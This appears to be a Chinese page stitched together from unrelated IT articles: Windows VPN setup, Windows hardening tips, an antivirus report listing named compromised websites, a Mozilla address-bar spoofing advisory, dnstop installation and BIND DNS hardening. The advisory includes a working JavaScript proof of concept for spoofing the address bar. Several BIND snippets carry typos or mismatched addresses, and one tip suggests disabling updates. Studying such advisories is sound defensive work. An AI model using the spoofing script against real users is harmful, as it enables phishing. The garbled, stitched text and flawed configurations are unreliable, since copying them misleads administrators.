在列出的本地服务器上点击右键，选择“配置并启用路由和远程访问”。下一步

在此，由于服务器是公网上的一台一般的服务器，不是具有路由功能的服务器，是单网卡的，所以这里选择“自定义配置”。下一步。

这里选“VPN访问”，我只需要VPN的功能。下一步，配置向导完成。

点击“是”，开始服务。
看启动了VPN服务后，“路由和远程访问”的界面
下面开始配置VPN服务器
在服务器上点击右键，选择“属性”，在弹出的窗口中选择“IP”标签，在“IP地址指派”中选择“静态地址池”。

然后点击“添加”按钮设置IP地址范围，这个IP范围就是VPN局域网内部的虚拟IP地址范围，每个拨入到VPN的服务器都会分配到一个范围内的IP，在虚拟局域网中用这个IP相互访问。
这里设置为10.240.60.1－10.240.60.10，一共10个IP，默认的VPN服务器占用第一个IP，所以，10.240.60.1实际上就是这个VPN服务器在虚拟局域网的IP。

至此，VPN服务部分配置完毕。
三、添加VPN用户
每个客户端拨入VPN服务器都需要有一个帐号，默认是windows身份验证，所以要给每个需要拨入到VPN的客户端设置一个用户，并为这个用户制定一个固定的内部虚拟IP以便客户端之间相互访问。
在管理工具中的计算机管理里添加用户，这里以添加一个chnking用户为例
先新建一个叫“chnking”的用户，创建好后，查看这个用户的属性，在“拨入”标签中做相应的设置，如图：
远程访问权限设置为“允许访问”，以允许这个用户通过VPN拨入服务器。
点选“分配静态IP地址”，并设置一个VPN服务器中静态IP池范围内的一个IP地址，这里设为10.240.60.2
如果有多个客户端机器要接入VPN，请给每个客户端都新建一个用户，并设定一个虚拟IP地址，各个客户端都使用分配给自己的用户拨入VPN，这样各个客户端每次拨入VPN后都会得到相同的IP。如果用户没设置为“分配静态IP地址”，客户端每次拨入到VPN，VPN服务器会随机给这个客户端分配一个范围内的IP。
四 配置windows 2003 客户端
客户端可以是windows 2003，也可以是Windows XP，设置几乎一样，这里以2003客户端设置为例。
选择程序――附件――通讯――新建连接向导，启动连接向导

这里选择第二项“连接到我的工作场所的网络”，这个选项是用来连接VPN的。下一步。

选择“虚拟专用网络连接”，下一步。
在“连接名”窗口，填入连接名称szbti，下一步。

这里要填入VPN服务器的公网IP地址。
下一步，完成新建连接。
完成后，在控制面板的网络连接中的虚拟专用网络下面可以看到刚才新建的szbti连接

在szbti连接上点击右键，选“属性”，在弹出的窗口中点击“网络”标签，然后选中“internet协议(tcp/ip)”，点击属性按钮，在弹出的窗口中再点击“高级”按钮，如图，把“在远程网络上使用默认网关”前面的勾去掉。
如果不去掉这个勾，客户端拨入到VPN后，将使用远程的网络作为默认网关，导致的后果就是客户端只能连通虚拟局域网，上不了因特网了。
下面就可以开始拨号进入VPN了，双击szbti连接，输入分配给这个客户端的用户名和密码，拨通后在任务栏的右下角会出现一个网络连接的图标，表示已经拨入到VPN服务器。
一旦进入虚拟局域网，客户端设置共享文件夹，别的客户端就可以通过其他客户端ip地址访问它的共享文件夹。
五 配置VSS
VSS是在一台机器上配置VSS数据库，把数据库的文件夹设置共享，局域网内别的机器可以访问到这个共享文件夹，就可以从源代码数据库中打开项目。
配置好VPN后，客户端之间就是相当于在局域网内，VSS的设置就跟局域网内一样的设置。
 

一、操作系统不要用盗版的，有后门的。

二、登录用户一定要设密码

在控制面板的用户里 这个总知道的吧。而且要把guest禁了，右击我的电脑－>管理->本地用户和组。

三、补丁一定要下齐全

不管是windows的还是第三方软件的。

四、关闭磁盘共享

也就是C、D、E、F、G、H 等 。开始－>运行 输入cmd回车，在cmd输入 net share c$ /delete （ 再把C换D ，依次下去。不怎么懂dos命令的，当然也可以在管理里的共享文件夹关闭 ）。

五、关闭远程访问

右击我的电脑属性 －>远程 把允许远程用户访问此计算机前面的点去掉。

六、防火墙打开

至于自动更新，看你是否是正版，盗版技术怎样。不知道的话，最好关了，以免以后造成麻烦。

七、把一些完全没必要的服务关掉

比如server、ipc、system restore service。关闭方法：

开始－>程序->管理工具->服务(右击我的电脑管理 更快)。还有些服务具体看需求，不需要的话就关闭。

附：

computer browser 如果不需要局域共享就关了；

dhcp client 如果ip是静态的 不需要获取自动ip禁了；

print spooler 如果没有打印机 就禁用了；

shell hardware detection 如果不需要自动播放就禁了；

TCP/IP NetBIOS helper 如果不需要对netbios做解析的禁了；

themes 如果不使用个性主题就禁了；

windows time 系统校对 纯属鸡助禁了；

wireless zero configuration 如果没有无线网卡就禁了；

workstastion 如果不需要局域共享就禁了。

八、防中马方法

开始-设置-控制面版-添加删除程序-windows安装程序-把附件里的windows scripting host去掉，然后打开Internet Explorer浏览器，点工具-Internet选项-安全-自定义级别，把里面的脚本的3个选项全部禁用，然后把“在中加载程序和文件”禁用，当然这只是简单的防治方法，不过可能影响一些网页的动态java效果，不过为了安全就牺牲一点啦，这样还可以预防一些恶意的网页炸弹和病毒。个人意识方面：不要乱翻网站，特别是在在qq群上发的网址，要是发的人没说明，没更多的话坚决不打开。也不乱打开陌生发的文件。

九、关闭一些搞危险和没必要的端口

实际上上门第四第五条也是关闭端口那样比较方便。有一些端口不借助第三方软件是比较难关闭的，我就介绍一种万能关闭方法：

1 点击 "开始菜单/设置/控制面板/管理工具"，双击打开"本地策月"，选中"ip安全策月,在本地计算机"右边的空白位置右击鼠标,谈出快捷菜单,选择"创建 ip安全策月"，弹出向导.在向导中点击下一步下一步，当显示"安全通信请求"画面时，把"激活默认相应规则"左边的钩去掉，点"完成"就创建了一个新的 ip安全策月。

2 右击该ip安全策略，在"属性"对话框中，把"使用添加向导"左边的钩去掉，然后再点击右边的"添加"按纽添加新的规则，随后弹出"新规则属性" 对话框，在画面上点击"添加"按纽,弹出ip筛选器列表窗口.在列表中，首先把"使用添加向导"左边的钩去掉,然后再点击右边的"添加"按纽添加新的筛选器。

3 进入"筛选器属性'对话框，首先看到的是寻地址,源地址选"任何ip地址"，目标地址选"我的ip地址"，点击"协议"选项卡，在"选择协议类型 "的下拉列表中选择“tcp",然后在"到此端口"的下的文本框中输入"135"，点击确定。这样就添加了一个屏蔽tcp135 端口的筛选器，可以防止外界通过135端口连上你的电脑。点击确定后回到筛选器列表的对话框,可以看到已经添加了一条策月。重复以上步骤继续添加tcp 137 139 445 593 端口和udp 135 139 445 端口，为它们建立相应的筛选器。重复以上步骤添加tcp 125 2745 3127 6129 3389 端口的屏蔽策月，建立好上述端口的筛选器,最后点击确定按纽。

4 在"新规则属性"对话框中，选择"新ip筛选器列表'然后点击其左边的复选框，表示已经激活。最后点击"筛选器操作"选项卡中，把"使用添加向导 "左边的钩去掉，点击"添加"按钮,进行"阻止"操作，在"新筛选器操作属性"的"安全措施"选项卡中,选择"阻止",然后点击"确定"。

5 进入"新规则属性"对话框,点击"新筛选器操作"，选取左边的复选框,表示已经激活，点击"关闭"按钮，关闭对话框.最后"新ip安全策月属性 "对话框，在"新的ip筛选器列表"左边打钩，按确定关闭对话框.在"本地安全策月"窗口，用鼠标右击新添加的ip安全策月，然后选择"指派"。

重新启动后,上述端口就可以关闭了!电脑就安全多了!这种方法自己看清楚点，可能要多试几遍。查看端口的方法是“开始”－>“运行” 输入cmd 回车 打开命令提示符后 再输入netstat -an （两个单词间有空格）

以上方法能对付一般的菜鸟入侵或者批量入侵。

当日安全综述：

据瑞星“云安全”系统统计，8月2日，共有950,104人次的网民遭到网页挂马攻击，瑞星共截获了69,556个挂马网址。

当日被挂马网站Top5：

（注意：以下网址都带有病毒，请不要点击）

1、“鼎盛防务论坛”：top.jschina.com.cn/forumdisplay.php?fid=7&sid=DDhWym，被嵌入的恶意网址为**. org:6677/a/ads.html。

2、“锦程物流网”：www1.jctrans.com/tongguan/tariff/2003querytariff/control.asp?ma=4ABtxy，
被嵌入的恶意网址为**cn/cache/ad.htm。

3、“海青网”：youth.dlmu.edu.cn/wen/ouou/2205.html,被嵌入的恶意网址为**cn/gana.html?统计。

4、“武汉市质量技术监督局”：www.whbts.gov.cn/xml/zhuanti/4481ronghen.html，被嵌入的恶意网址为** cn/editor/SysImage/sema.htm。

5、“罗江县地方税务局信息网”：www.ljdsj.gov.cn，被嵌入的恶意网址为**com/images/inc/a6.htm。

当日最流行木马病毒：

Trojan.PSW.Win32.OnlineGame.aus（木马病毒）

  分析了下，可能是由于前段时间公司和我本人家里的事情特别多，网站一直没有更新，都是用一些技巧性的办法促使百度天天更新我的快照。

    可惜的是，这个方法最终引来了恶果，在一次比较大的更改网站首页的布局后，百度首页快照就一直停留在21号。

     为此，作为一名SEOER，我必须立即解决这个问题，所以我制定了一个方案具体如下：

1.注册一个百度空间  名字也叫服务器维护，利用百度空间来转载我这个网站的文章，一天1-2篇即可（都带本网站的网址）

2.每天至少更新一篇原创文章；

3.交换友情连接

    总结了下，投机取巧不可行，唯有耐力铁棒磨成针。

由于浏览器在处理某些伪协议时存在安全问题，导致恶意站点可以实现地址栏欺骗，用户可能在毫无知觉的情况下被引导进去一个钓鱼或者欺骗页面，该页面的地址栏是完全正确的地址，内容却可以被随意构造。

测试方法:
本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!
<script language="javascript">
function pause(pd)
{
date = new Date();
var curDate = null;
do { var curDate = new Date(); }
while(curDate-date < pd);
}
function Spoofing () {
win = window.open('http://www.google.com','new')
pause (3000)
win = window.open('http://www.Securitylab.ir','new')
}
</script>
<a href="javascript: Spoofing()">Click Here</a>
安全建议:
厂商补丁：

Mozilla
-------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.mozilla.org/
 

在维护DNS服务器时，用户往往希望知道到底是哪些用户在使用DNS服务器，同时也希望能对DNS状态查询做一个统计，以及时地知道DNS的工作情况和状态。在传统的方式下，用户通常使用的是tcpdump等开源工具来进行抓包并通过查看53端口的流量来查看DNS数据包。由于tcpdump并没有针对DNS流量进行特殊定制，因此使用起来可能不是非常方便。因此，用户可以使用专用于DNS的dnstop工具查询DNS服务器状态。

dnstop是一种非常优秀的开源软件，用户可以到网站http://dns.measurement-factory.com/tools/dnstop/src/上进行下载使用，目前该软件的最新版本为：dnstop-20090128.tar.gz。

由于该软件依赖tcpdump和pcap抓包库（libpcap）对网络上传输的数据包进行截获和过滤，所以用户需要确保系统安装相应软件后才能正常安装和使用dnstop。通常情况下，这两种必须的库都已经在系统中预装好了，使用下面的命令安装dnstop即可：

（1）解压缩源代码安装包

#tar vxfz ddnstop-20090128.tar.gz

（2）切换到解压目录，并使用configure命令生成Makefile文件

#cd dnstop-20040309 #./configure

（3）使用make命令进行安装

#make

安装成功后，可以查看通过相应的网络接口来监控DNS网络流量，如下所示：

#./dnstop -s eth0 0 new queries, 6 total queries Tue Mar 26 19:35:23 2008 Sources count % ---------------- --------- ------ 172.96.0.13 4 66.7 172.96.0.14 1 16.7 172.96.0.15 1 16.7

通常软件的漏洞和风险信息是和特定版本相关的，因此版本号是黑客进行攻击所需要搜集的最有价值的信息之一。黑客使用dig命令可以查询BIND的版本号，然后黑客就能够通过版本号查询知道这个软件有那些漏洞，并寻求相应的工具来针对该漏洞进行攻击。因此，随意公开BIND版本号是不明智的，具有很大的风险。其实，隐藏BIND版本号比较简单，只需要修改配置文件/etc/named.conf，在option部分添加version声明将BIND的版本号信息进行覆盖即可。使用下面的配置声明将BIND版本号覆盖，当有人请求版本信息时，将无法得到有用的版本信息：

options { version “Unkown” };

（6）使用非root权限运行BIND

在Linux内核2.3.99以后的版本中，可以以-u选项以非root权限运行BIND。该命令表示以nobody用户身份运行BIND，使用nobody身份运行能够降低缓冲区溢出攻击所带来的危险。命令如下：

#/usr/local/sbin/named –u nobody

（7）删除DNS上不必要的其他服务

删除DNS机器上不必要的其他服务。网络服务是造成系统安全的重要原因，常见的DoS攻击、弱脚本攻击以及缓冲区溢出攻击都是由于系统存在网络服务所引起的。在安装DNS运行所依赖的操作系统前，就应该确定在系统中运行的服务的最小集合，创建一个DNS服务器系统就不应该安装Web、POP、gopher、NNTP News等服务。建议不安装以下软件包：（1）X-Windows及相关的软件包；（2）多媒体应用软件包；（3）任何不需要的编译程序和脚本解释语言；（4）任何不用的文本编辑器；（5）不需要的客户程序；（6）不需要的其他网络服务。

（8）合理配置DNS的查询方式

DNS的查询方式有两种，递归查询和迭代查询。合理配置这两种查询方式，能够在实践中取得较好的效果。

其中，递归查询是最常见的查询方式，工作方式是：域名服务器将代替提出请求的客户机（下级DNS服务器）进行域名查询，若域名服务器不能直接回答，则域名服务器会在域各树中的各分支的上下进行递归查询，最终将返回查询结果给客户机，在域名服务器查询期间，客户机将完全处于等待状态。具体流程示意请见图1： 

图1  DNS递归查询模式示意

迭代查询又称重指引查询。其工作方式为：当服务器使用迭代查询时能够使其他服务器返回一个最佳的查询点提示或主机地址，若此最佳的查询点中包含需要查询的主机地址，则返回主机地址信息，若此时服务器不能够直接查询到主机地址，则是按照提示的指引依次查询，直到服务器给出的提示中包含所需要查询的主机地址为止，一般的，每次指引都会更靠近根服务器（向上），查寻到根域名服务器后，则会再次根据提示向下查找。具体流程示意如图2所示：  

图2  DNS迭代查询模式示意

综合上面两点，我们可以看出来，递归查询就是客户机会等待最后结果的查询，而迭代查询是客户机等到的不一定是最终的结果，而可能是一个查询提示。因而存在如下两个问题： 

◆二级DNS向一级DNS发起递归查询，会对一级DNS造成性能压力，所有跨域查询都要经过一级DNS响应给对应二级DNS； 

◆二级DNS向一级DNS发起递归查询，再由一级向归属DNS发起递归的模式查询响应会有一定延时；

因此，有很多流量很大的DNS服务器是禁止客户机使用递归查询，用这种方式来减轻服务器的流量。
 

关闭递归查询可以使名字服务器进入被动模式，它再向外部的DNS发送查询请求时，只会回答自己授权域的查询请求，而不会缓存任何外部的数据，所以不可能遭受缓存中毒攻击，但是这样做也有负面的效果，降低了DNS的域名解析速度和效率。

以下语句仅允许172.168.10网段的主机进行递归查询：

allow-recusion {172.168.10.3/24; }

（2）限制区传送（zone transfer）

如果没有限制区传送，那么DNS服务器允许对任何人都进行区域传输，因此网络架构中的主机名、主机IP列表、路由器名和路由IP列表，甚至包括各主机所在的位置和硬件配置等情况都很容易被入侵者得到在DNS配置文件中通过设置来限制允许区传送的主机，从一定程度上能减轻信息泄漏。但是，需要提醒用户注意的是：即使封锁整个区传送也不能从根本上解决问题，因为攻击者可以利用DNS工具自动查询域名空间中的每一个IP地址，从而得知哪些IP地址还没有分配出去，利用这些闲置的IP地址，攻击者可以通过IP欺骗伪装成系统信任网络中的一台主机来请求区传送。

以下语句仅允许IP地址为172.168.10.1和172.168.10.2的主机能够同DNS服务器进行区域传输：

acl list {  221.3.131.5;   221.3.131.6;   zone "test.com" {   type master;   file "test.com ";     allow-transfer { list; };   };   };

（3）限制查询（query）

如果任何人都可以对DNS服务器发出请求，那么这是不能接受的。限制DNS服务器的服务范围很重要，可以把许多入侵者据之门外。修改BIND的配置文件：/etc/named.conf加入以下内容即可限制只有210.10.0.0/8和211.10.0.0/8网段的查询本地服务器的所有区信息，可以在options语句里使用如下的allow-query子句：  

options {   allow-query { 210.10.0.0/8; 211.10.0.0/8;};   };

（4）分离DNS（split DNS）

采用split DNS（分离DNS）技术把DNS系统划分为内部和外部两部分，外部DNS系统位于公共服务区，负责正常对外解析工作；内部DNS系统则专门负责解析内部网络的主机，当内部要查询Internet上的域名时，就把查询任务转发到外部DNS服务器上，然后由外部DNS服务器完成查询任务。把DNS系统分成内外两个部分的好处在于Internet上其它用户只能看到外部DNS系统中的服务器，而看不见内部的服务器，而且只有内外DNS服务器之间才交换DNS查询信息，从而保证了系统的安全性。并且，采用这种技术可以有效地防止信息泄漏。

在BIND 9中可以使用view语句进行配置分离DNS。view语句的语法为：

view view_name {       match-clients { address_match_list };                 [ view_option; ...]       zone_statement; ...   };

其中： 

◆match-clients：该子句非常重要，它用于指定谁能看到本view。可以在view语句中使用一些选项； 

◆zone_statement：该子句指定在当前view中可见的区声明。如果在配置文件中使用了view语句，则所有的zone语句都必须在view中出现。对同一个zone而言，配置内网的view应该置于外网的view之前。

下面是一个使用view语句的例子，它来自于BIND9的标准说明文档：

view  "internal" {   match-clients { our-nets; };              // 匹配内网客户的访问 recursion yes;                              // 对内网客户允许执行递归查询   zone "example.com" {                      // 定义内网客户可见的区声明        type master;     file "example.com.hosts.internal";   };   };   view  "external" {   match-clients { any; };                   // 匹配 Internet 客户的访问 recursion no;                             // 对 Internet 客户不允许执行递归查询   zone "example.com" {                     // 定义 Internet 客户可见的区声明      type master; file "example.com.hosts.external";   };   };

接下来，需要在example.com.hosts.internal中创建内网客户可见的区文件，并在example.com.hosts.external中创建Internet客户可见的区文件。该区文件的编写可以根据用户的实际情况，可以参看上面介绍的内容，此处不再赘述。
 

　　夺天下难，守天下更难，服务器的维护就好比“守天下”！稍乱分寸即会使整个网络陷入瘫痪，作为网络管理的一员，笔者在实际维护工作中碰到过不少问题，服务器不仅仅是企业网络设备的中枢，也是企业软件及数据库应用的主体。在实际运行中服务器经常会出现这样或那样的故障，软件的或者硬件的。很多故障是没有规律可言的。

　　服务器的维护可以分为硬件维护和软件维护两种，硬件维护比较简单，主要是保证机房的温湿度，做好防尘防火，定时更换硬件设备等，而软件维护又包括对操作系统的维护和对主机上所跑应用的维护，这一部分是比较难的，需要对操作系统、应用软件系统有比较深入的认识和了解。

　　服务器的软维护比较困难原因有三

　　操作系统方面

　　操作系统是服务器运行的软件基础，其重要性不言自明。如果服务器操作系统使用Windows 2003或Windows 2000 Server作为操作系统，维护起来还是比较容易的，只要按时打好补丁，订时查看日志就可以。但是如果是LINUX和UNIX操作系统的话，需要对管理员的技术有相当高的要求，需要管理员具备一定的专业知识。

　　服务器上的应用维护

　　服务器上的应用软件都是运行的企业的核心数据，是企业的最重要的数据之一，不容出错，如果数据出现丢失或者服务停止的话对于企业来说是致命的， 企业的应用已经成了企业生存和发展的重要组成部分，应用是企业核心业务的血液，当企业应用的规模越来越大时，应用也随之越来越多，如何迅速有效的对这些关键应用进监控就成为了迫切棘手的问题。

　　7*24小时不间断

　　除了上述二点列出的技术上的困难之外，还有一个重要的问题就是企业的服务器及上面所跑的应用都是实时性很高的业务，必须得保证7*24小时不间断，单纯的管理员维护的话实时性太差，管理员不可以一天二十四小时盯着服务器，所以现实中经常出现服务器出现Ｄown机或者服务器上的应用出了问题，管理员往往不能第一时间知道，往往都是实际使用服务器或都应用的人去通知管理员，这时业务可能已经停了好长时间，这对于企业来说无疑是很大的损失。